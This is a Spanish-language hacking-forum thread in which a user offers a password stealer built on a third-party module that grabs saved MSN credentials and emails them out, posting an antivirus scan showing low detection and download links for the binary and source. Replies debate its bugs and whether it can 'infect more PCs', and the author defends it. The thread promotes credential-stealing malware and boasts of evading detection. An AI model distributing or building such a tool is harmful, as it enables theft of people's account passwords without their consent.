Foro de elhacker.net

Que hace?
Obtiene contraceñas y las manda por email

Para que sirve?
Mata, Mata, MATAA!
Si te olvidaste la contraceña y la tenes guardada en el msn con esto la recuperas.

Como hace?
Usa el modulo WLMPD de Cobein.

Foto:
(http://s3.subirimagenes.com:81/imagen/4858450captura.png)

(http://s2.subirimagenes.com/imagen/4858494sin-ttulo.png)

Escaneo:
File Info

Report date: 2010-07-26 16:09:29 (GMT 1)
File name: ElementalStub.dll
File size: 49152 bytes
MD5 Hash: cd7d2e1805a1c57d747da1dee5428aaf
SHA1 Hash: 383b5f71c797c99942cef684a94a2c99fce7103d
Detection rate: 2 on 16 (13%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir - TR/Spy.Gen
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 - W32/VBTrojan.17G!Maximus
G-Data -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -


Ver Reporte (http://scanner.novirusthanks.org/analysis/cd7d2e1805a1c57d747da1dee5428aaf/RWxlbWVudGFsU3R1Yi5leGU=/)

Descarga
Depositfiles:
http://depositfiles.com/files/7lxj5fqz3

Mirror Fileserve:
http://www.fileserve.com/file/KeGv9VW

No puedo confiar de alguien que no es capas de escribir contraseñas  ;-)
Tranquilamente te las podrias mandar a tu correo y al correo del usuario que lo usa, igual despues lo pruebo en la virtual.  ;)


saludos  :D

para eso deje el codigo fuente  >:( >:(

me "ofende" que duden de mi  :rolleyes: :rolleyes:

@Elemental Code: No dudamos de ti, así hay personas, a lo mejor la respuesta de Zazú es un poco dura.

Saludos y gracias por el código, muy útil :D

Ahora lo veo de nuevo, tenes razón, comente cualquier cosa por que todavia no me lo habia bajado pero despues vi que estaba el source  :silbar:

Mis disculpas y muchas gracias!  ;)

 :¬¬ Antes de dejar un mensaje agradeciendo. Primero deben de probar el source.

EL primer bug que encontré es que el stub es una cagada. También cabe destacar que hace una modificación muy sospechosa. El stub es un ".exe" pero luego de ejecutarlo se transforma en ".dll".

Eso no es todo. No funciona el archivo para enviar. Al testear si funciona el envio. Pero para infectar a más pcs no funciona ni para adorno.

Ah... otra cosa. Nunca, pero nunca ejecuten un archivo compilado siendo que ya da su codigo fuente. Lo más recomendable es compilarlo uno mismo.

Repara el error del stub. No postees cosas que no serviran a nadie.

Saludos.
By: drwd.

@warner2010: no es una herramienta para que la uses, es un source para que lo veas.

@ElementalCode: Trata  de hacer tus GUI sin faltas ortograficas... deja mucho que decir.

Solo veo en la imagen las faltas de ortografia, por lo demás creo que esta bien, ahora miraré el code.

Saludos

Buen programa Elemental Code te felicto,y ese modulo que decir simplemente cobein un gran maetro del visual basic.

gracias!

discusiones por privado.

El stealer una vez creado si funciona.
Fijate que hayas puesto todas las direcciones bien y no "infecta" la maquina, no me gustan los stealers que se instalan porque te llenan la casilla con mensajes repetidos.

ah, me olvidaba, el stub es un exe que le cambie la extensión a DLL. Eso lo especifique en el codigo si no me equivoco  :silbar: es para que al compilarlo sea mas fácil distinguir cual es cual, ademas le da un toque mas de profesionalismo

PD: Ya se que mi ortografía es patética